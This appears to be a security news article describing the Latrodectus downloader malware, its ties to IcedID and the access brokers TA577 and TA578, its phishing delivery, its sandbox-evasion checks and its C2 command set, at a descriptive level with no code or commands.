Latrodectus Malware

Security analysts have uncovered a novel malware dubbed Latrodectus, which has been circulated through email phishing endeavors since at least late November 2023. Latrodectus stands out as an emerging downloader equipped with diverse sandbox evasion capabilities, meticulously crafted to fetch payloads and execute arbitrary commands.

There are indications implying that the creators of the notorious IcedID malware are likely behind the development of Latrodectus. This downloader is employed by initial access brokers (IABs) to streamline the deployment of other malicious software.

Latrodectus is predominantly associated with two distinct IABs, identified as TA577 (also known as Water Curupira) and TA578. Of note, TA577 has been implicated in the dissemination of QakBot and PikaBot as well.

Latrodectus May Be Superceding Older Malware Threats

By mid-January 2024, Latrodectus has been predominantly utilized by TA578 in email-based threat campaigns, often disseminated through DanaBot infections. TA578, a known actor since at least May 2020, has been associated with various email campaigns distributing Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, Cobalt Strike, and Bumblebee.

The attack sequences involve exploiting website contact forms to send legal threats regarding purported copyright violations to targeted organizations. Embedded links within these messages redirect recipients to deceptive websites, prompting them to download a JavaScript file responsible for initiating the primary payload via msiexec.

Latrodectus encrypts system data and forwards it to the Command-and-Control server (C2), initiating a request for bot download. Once the bot establishes contact with the C2, it proceeds to solicit commands from it.

The Latrodectus Malware May Carry Out Numerous Invasive Commands

The malware possesses the capability to detect sandboxed environments by verifying the presence of a valid MAC address and a minimum of 75 running processes on systems running Windows 10 or newer.

Similar to IcedID, Latrodectus is programmed to transmit registration details via a POST request to the C2 server, where the fields are concatenated into HTTP parameters and encrypted. Subsequently, it awaits further instructions from the server. These commands empower the malware to enumerate files and processes, execute binaries and DLL files, issue arbitrary directives via cmd.exe, update the bot, and even terminate running processes.

Further scrutiny of the attacker infrastructure reveals that the initial C2 servers became operational on September 18, 2023. These servers are configured to interact with an upstream Tier 2 server established around August 2023.

The association between Latrodectus and IcedID is evident from the T2 server's connections with backend infrastructure linked to IcedID, along with the utilization of jump boxes previously tied to IcedID operations.

Researchers anticipate a surge in Latrodectus usage by financially motivated threat actors in the criminal realm, especially those who have previously disseminated IcedID.